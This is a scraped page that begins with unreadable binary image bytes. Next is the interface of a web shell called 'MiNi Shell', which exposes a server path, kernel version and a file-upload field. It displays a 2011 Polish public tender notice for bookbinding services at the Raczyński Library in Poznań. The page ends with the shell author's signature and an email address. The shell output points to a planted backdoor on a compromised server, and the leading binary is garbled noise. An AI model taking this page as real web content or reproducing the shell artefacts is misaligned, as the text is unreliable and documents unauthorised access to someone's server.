JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/79498-N-2011.html

<p class="kh_header"><b>Poznań: Usługi introligatorskie dla Biblioteki Raczyńskich w Poznaniu w 2011 r.</b><br>
<b>Numer ogłoszenia: 79498 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biblioteka Raczyńskich , Pl. Wolności 19, 61-739 Poznań, woj. wielkopolskie, tel. 061 8529868, 8521734, faks 061 8529868.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bracz.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi introligatorskie dla Biblioteki Raczyńskich w Poznaniu w 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi introligatorskie dla Biblioteki Raczyńskich w Poznaniu w 2011r

Ustalenia ogólne dotyczące przedmiotu zamówienia:
Zamawiający dopuszcza możliwości składania ofert częściowych na zadania:

Część nr 1 - Oprawa czasopism bieżących:
Przedmiotem zamówienia jest usługa oprawy 1.100 vol. czasopism, z tego:
- 200 wol. formatu dużego (powyżej 35 cm wysokości grzbietu),
- 900 wol. formatu średniego ( do 35 cm włącznie wysokości grzbietu).

Część nr 2 - Oprawa książek XIX-wiecznych i z I poł. XXw (z rekonstrukcją opraw i elementami naprawy)
1) Oprawa z elementami naprawy i rekonstrukcji oprawy 
a) 50 książek formatu grzbietu powyżej 35 cm
półskórek, imitacja zwięzów na grzbiecie, złocone napisy na grzbietach, okładki pokrywane papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
b) 100 książek formatu grzbietu powyżej 35 cm
półskórek bez imitacji zwięzów na grzbiecie i bez napisów, pokrycie papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
c) 200 książek formatu grzbietu w granicach 25 - 34 cm
półskórek bez imitacji zwięzów na grzbiecie i bez napisów, pokrycie papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
d) 100 książek formatu grzbietu w granicach 10 - 34 cm
grzbiet z płótna, oprawa broszurowa w kartonie bezkwasowym, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego, ewentualne zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust. 1 pkt. 6 Prawa zamówień publicznych, jeżeli spełnione zostaną przesłanki ustawowe</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować zrealizowanie przynajmniej dwóch usług w zakresie odpowiadającym przedmiotowi zamówienia w okresie ostatnich trzech lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Dla części nr 1 - Oprawa  bieżąca czasopism - dwóch usług o wartości nie mniejszej niż 10.000,- brutto każda, obejmująca okres realizacji usługi nie dłuższy niż 12 miesięcy lub rok kalendarzowy.
Dla części nr 2 - Oprawa książek XIX-wiecznych i z I poł. XXw (z rekonstrukcją opraw i elementami naprawy)- dwóch usług o wartości nie mniejszej niż  3.000,- brutto każda w ramach której co najmniej połowa zamówienia dotyczyła opraw o wartości jednostkowej dla książki nie niższej niż 100,- zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale 4, punkt 4.1 ppkt.2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale 4, punkt 4.1 ppkt.2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie opisu sposobu dokonywania oceny jego spełniania. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w rozdziale 4, punkt 4.1 ppkt.2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian w umowie w następujących przypadkach:
a) Zamawiający zastrzega sobie prawo zmniejszenia zakresu usług stanowiących przedmiot umowy, w razie wystąpienia istotnej okoliczności powodującej, że wykonanie części Umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia. W przypadku, o którym mowa powyżej Wykonawcy przysługuje wynagrodzenie za prace faktycznie wykonane,
b) Zmiany terminu wykonania umowy z przyczyn innych niż zawinione przez Wykonawcę, z powodu siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c) W zakresie zmiany terminu umowy z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, 
d) W przypadku zmiany stawki podatku od towarów i usług VAT,
e) Gdy zmiany będą korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.city.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biblioteka Raczyńskich,
plac Wolności 19,
61-739 Poznań,
pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 09:00, miejsce: Biblioteka Raczyńskich,
plac Wolności 19,
61-739 Poznań,
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oprawa czasopism bieżących.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest usługa oprawy 1.100 vol. czasopism, z tego:
- 200 wol. formatu dużego (powyżej 35 cm wysokości grzbietu),
- 900 wol. formatu średniego ( do 35 cm włącznie wysokości grzbietu).
2) Transport przedmiotu zamówienia, obejmujący - odbiór czasopism z budynku Zamawiającego (Poznań, ul. Św. Marcin 65)- dostarczenie ich do Wykonawcy oraz zwrot oprawionych materiałów do Zamawiającego, jest wkalkulowany w cenę oferty i Wykonawca nie może żądać z tego tytułu dodatkowego wynagrodzenia. 
Transport odbywa się w terminach ustalonych z Zamawiającym.
2. Termin wykonania zamówienia: 31 grudnia 2011
1) Podstawę realizacji stanowią zamówienia składane przez Bibliotekę Raczyńskich
2) Poszczególne zamówienia (do 250 vol.) podlegają realizacji przez Wykonawcę w okresach nie dłuższych niż 30 dni od daty ich złożenia przez Zamawiającego.
3. Zamówienie na oprawę czasopism dla Biblioteki Raczyńskich obejmuje:
1) Wstępną konserwację, która w razie potrzeby, polega na wyrównaniu brzegów oprawianego egzemplarza (bez obcinania tekstu) oraz podklejeniu uszkodzonych kartek.
2) Wykonanie oprawy bibliotecznej z materiału typu Kanafas lub równoważnego. Okładka musi być połączona w sposób trwały z wkładem.
3) Okładki tekturowe musza być wykonane z materiału o gramaturze odpowiadającej poszczególnym formatom. Dla wymienionych formatów gramatura tektury wynosi:
- format A5, B5 gramatura 1400g/m2
- format A4, B4 gramatura 1600 g/m2
- format A3, B3 gramatura 1800 g/m2
- format A2, B2 gramatura 2000 g/m2.
4) Łączenie kompletu składek lub kartek musi być wykonane techniką zszywania.
5) Należy wykonać grzbiety profilowane, które umożliwiają swobodne otwieranie bloku czasopisma.
6) Oprawy powinny być wykonane w sposób jednolity pod względem jakości, techniki wykonania, kolorystyki oraz oprawy graficznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oprawa XIX-wiecznych i z I poł. XXw książek (z rekonstrukcją opraw i elementami naprawy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1) Oprawa z elementami naprawy i rekonstrukcji oprawy 
a) 50 książek formatu grzbietu powyżej 35 cm
półskórek, imitacja zwięzów na grzbiecie, złocone napisy na grzbietach, okładki pokrywane papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
b) 100 książek formatu grzbietu powyżej 35 cm
półskórek bez imitacji zwięzów na grzbiecie i bez napisów, pokrycie papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
c) 200 książek formatu grzbietu w granicach 25 - 34 cm
półskórek bez imitacji zwięzów na grzbiecie i bez napisów, pokrycie papierem ozdobnym bądź płótnem, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
d) 100 książek formatu grzbietu w granicach 10 - 34 cm
grzbiet z płótna, oprawa broszurowa w kartonie bezkwasowym, dopuszczalna konieczność przeszywania wkładu, drobne naprawy uszkodzeń kart
2)  Transport przedmiotu zamówienia, obejmujący - odbiór książek z budynku Zamawiającego ( Poznań, ul. Św. Marcin 65 ) - dostarczenie ich do Wykonawcy oraz zwrot oprawionych materiałów do Zamawiającego, jest wkalkulowany w cenę oferty i Wykonawca nie może żądać z tego tytułu dodatkowego wynagrodzenia. Transport odbywa się w terminach ustalonych z Zamawiającym.
2. Termin wykonania zamówienia: 31 grudnia 2011
1) Podstawę realizacji stanowią zamówienia składane przez Bibliotekę Raczyńskich
2) Poszczególne zamówienia (do 50 vol.) podlegają realizacji przez Wykonawcę w okresach nie dłuższych niż 30 dni od daty ich złożenia przez Zamawiającego.
3. Zamówienie na oprawę książek dla Biblioteki Raczyńskich obejmuje:
1) Wstępną konserwację ,która w razie potrzeby polega na podklejeniu uszkodzonych kartek.
2) Wykonanie oprawy bibliotecznej 
- grzbiet ze skóry (w razie możliwości wykorzystanie dotychczasowych elementów okładki),
- okładki tekturowe pokryte papierem lub płótnem (kategorie opraw wymienionych w pkt. 1-3)
- okładki kartonowe (kategoria opraw wymieniona w pkt.4) 
3)  Papier do pokrycia, oraz okładki tekturowe i kartonowe muszą być wykonane z materiału bezkwasowego (tektura o gramaturze nie mniejszej niż 1200g/m2)
4) Łączenie kompletu składek lub kartek musi być wykonane techniką zszywania.
5) Należy wykonać grzbiety profilowane, które umożliwiają swobodne otwieranie bloku książki.
6) Dla kategorii opraw wymienionych w pkt.1 należy wytłoczyć złocony czytelny napis na  grzbiecie oprawy wg wzoru Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.97.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com